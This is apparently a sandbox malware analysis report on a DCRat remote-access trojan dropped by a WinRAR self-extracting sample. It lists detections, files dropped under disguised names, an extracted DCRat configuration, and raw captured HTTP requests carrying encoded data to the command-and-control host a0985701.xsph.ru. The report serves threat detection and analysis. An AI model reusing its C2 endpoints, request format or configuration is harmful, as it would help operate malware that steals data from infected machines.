GZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgL	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\bridgeportserver\u0vIoi.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\bridgeportserver\blockServerruntime.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Windows\addins\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"E\":\"~\",\"J\":\"@\",\"h\":\"%\",\"j\":\"#\",\"1\":\"(\",\"l\":\"&\",\"S\":\"$\",\"3\":\"!\",\"M\":\"<\",\"8\":\";\",\"o\":\"-\",\"c\":\")\",\"Z\":\"`\",\"4\":\"_\",\"y\":\"^\",\"5\":\"*\",\"d\":\">\",\"6\":\"|\",\"B\":\".\",\"H\":\",\",\"p\":\" \"}", "PCRT": "{\"B\":\" \",\"V\":\"|\",\"F\":\")\",\"Q\":\"<\",\"l\":\"`\",\"M\":\"!\",\"W\":\">\",\"k\":\";\",\"c\":\"-\",\"w\":\"@\",\"S\":\"%\",\"U\":\"^\",\"d\":\"_\",\"m\":\"$\",\"D\":\"*\",\"X\":\"&\",\"R\":\".\",\"v\":\"#\",\"j\":\"(\",\"N\":\"~\",\"K\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-84cmi9yxIS6Lop3CzZmk", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "H2": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "T": "0"}

Multi AV Scanner detection for domain / URL

Source: a0985701.xsph.ru	Virustotal: Detection: 10%	Perma Link
Source: http://a0985701.xsph.ru/	Virustotal: Detection: 10%	Perma Link
Source: http://a0985701.xsph.ru	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	ReversingLabs: Detection: 87%
Source: C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Windows\addins\RuntimeBroker.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\addins\RuntimeBroker.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\bridgeportserver\blockServerruntime.exe	ReversingLabs: Detection: 87%
Source: C:\bridgeportserver\blockServerruntime.exe	Virustotal: Detection: 67%	Perma Link

Multi AV Scanner detection for submitted file

Source: N0tepkRPzw.exe	ReversingLabs: Detection: 68%
Source: N0tepkRPzw.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.5% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Joe Sandbox ML: detected
Source: C:\bridgeportserver\blockServerruntime.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Joe Sandbox ML: detected
Source: C:\Windows\addins\RuntimeBroker.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: N0tepkRPzw.exe

Joe Sandbox ML: detected

Source: N0tepkRPzw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\bridgeportserver\blockServerruntime.exe	Directory created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe			Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Directory created: C:\Program Files\7-Zip\Lang\c4950d50751633			Jump to behavior

Source: N0tepkRPzw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: N0tepkRPzw.exe

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00D5A5F4
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00D6B8E0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 141.8.192.26:80 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 141.8.192.26:80 -> 192.168.2.4:49749

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://a0985701.xsph.ru/@=AzYyIGNycDO

Source: Joe Sandbox View	IP Address: 141.8.192.26 141.8.192.26
Source: Joe Sandbox View	IP Address: 141.8.192.26 141.8.192.26

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy&7545dfb3365e5b9fe53ef5879182e1a7=0df81b81d71e3e7c3a0591c145dca1b2&64f08b8004af955eddd13c6a6e9c8200=QNzATY3I2NxImYzQDM4EDMihjY4ImNmJWYwAzYwQmZmV2MxcDNhBDN&JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&b23843f8eb998a6848c0ef54cab04792=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWU